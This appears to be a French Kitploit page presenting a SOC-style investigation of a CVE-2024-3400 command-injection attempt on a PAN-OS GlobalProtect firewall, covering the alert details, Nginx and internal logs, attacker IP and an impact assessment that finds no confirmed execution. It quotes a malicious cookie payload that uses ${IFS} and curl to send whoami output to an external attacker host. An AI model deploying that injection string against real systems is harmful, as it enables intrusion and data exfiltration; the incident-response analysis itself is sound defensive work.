Skip to content
KitploitKITPLOIT
OutilsBlog
Log in
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
PAN-OS-CVE-2024-3400-Command-Injection-Investigation — Investigation d'une tentative d'injection de commande PAN-OS CVE-2024-3400, analysant la livraison de la charge utile, le traitement interne et la validation de l'exécution basée sur des preuves de logs. | Kitploit
Outils/GitHubGitHub/zedocun/pan-os-cve-2024-3400-command-injection-investigation
Analyse des VulnérabilitésSécurité WebCriminalistique NumériqueRenseignement sur les MenacesRéponse aux IncidentsAnalyse de Journaux
GitHubzedocun/pan-os-cve-2024-3400-command-injection-investigation

PAN-OS-CVE-2024-3400-Command-Injection-Investigation

Investigation d'une tentative d'injection de commande PAN-OS CVE-2024-3400, analysant la livraison de la charge utile, le traitement interne et la validation de l'exécution basée sur des preuves de logs.

Voir le dépôt
115il y a 5 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Read on Medium

Enquête sur une tentative d’injection de commande PAN-OS CVE-2024-3400

Aperçu

Ce projet documente l’enquête sur une tentative d’injection de commande CVE-2024-3400 ciblant un service PAN-OS GlobalProtect.

L’objectif était de déterminer :

  • s’il s’agit d’une véritable attaque
  • si l’exécution de commande a eu lieu
  • s’il existe des preuves de compromission

Aperçu de l’alerte

Une alerte critique a été déclenchée indiquant une tentative d’exploitation possible.

  • Cible : 172.16.17.139 (PA-Firewall-01)
  • Source : 144.172.79.92
  • Point de terminaison : /global-protect/login.esp
  • Méthode : POST
  • Action : Autorisée

Aperçu de l’alerte


Charge utile malveillante

La requête contient un cookie conçu :

SESSID=... curl${IFS}144.172.79.92:4444?user=$(whoami)

Charge utile

Observations clés

  • ${IFS} contourne le filtrage des espaces
  • whoami tente de récupérer l’identité du système
  • curl tente une communication sortante

Il s’agit d’une charge utile d’injection de commande


Preuves du serveur web

Les journaux Nginx confirment que la requête a atteint le serveur :

POST /global-protect/login.esp
HTTP 200
User-Agent: curl

Journaux Nginx

La requête malveillante a été acceptée et traitée.


Traitement interne

Les journaux système montrent que la charge utile a atteint la logique interne :

Journaux de traitement

Découverte clé

  • la charge utile a été intégrée dans une commande interne (dt_curl)
  • une requête sortante a été tentée
  • la chaîne d’exécution a atteint des composants internes

Cependant :

La résolution DNS a échoué → la requête sortante a échoué


Infrastructure de l’attaquant

L’IP attaquante :

  • 144.172.79.92
  • signalée comme malveillante
  • associée à un fournisseur d’hébergement

IP de l’attaquant

Cela confirme une origine externe de l’attaquant.


Chronologie réseau

Plusieurs IP ont interagi avec le système avant l’attaque :

Chronologie

Seule 144.172.79.92 est directement liée à l’exploitation.


Évaluation de l’impact

Confirmé

  • tentative d’exploitation ciblant CVE-2024-3400
  • charge utile malveillante délivrée
  • requête traitée par le serveur
  • charge utile a atteint le traitement interne
  • tentative sortante déclenchée

Non confirmé

  • exécution de commande système
  • sortie de commande
  • exfiltration de données
  • shell inversé
  • persistance
  • mouvement latéral

Conclusion

Il s’agissait d’une véritable tentative d’injection de commande.

L’attaquant a réussi à :

  • délivrer une requête malveillante
  • injecter une charge utile
  • déclencher un traitement interne

Cependant :

il n’y a aucune exécution ou compromission système confirmée


Classification finale

Tentative d’injection de commande
Charge utile traitée - Aucune exécution ou impact confirmé

Télécharger l’outil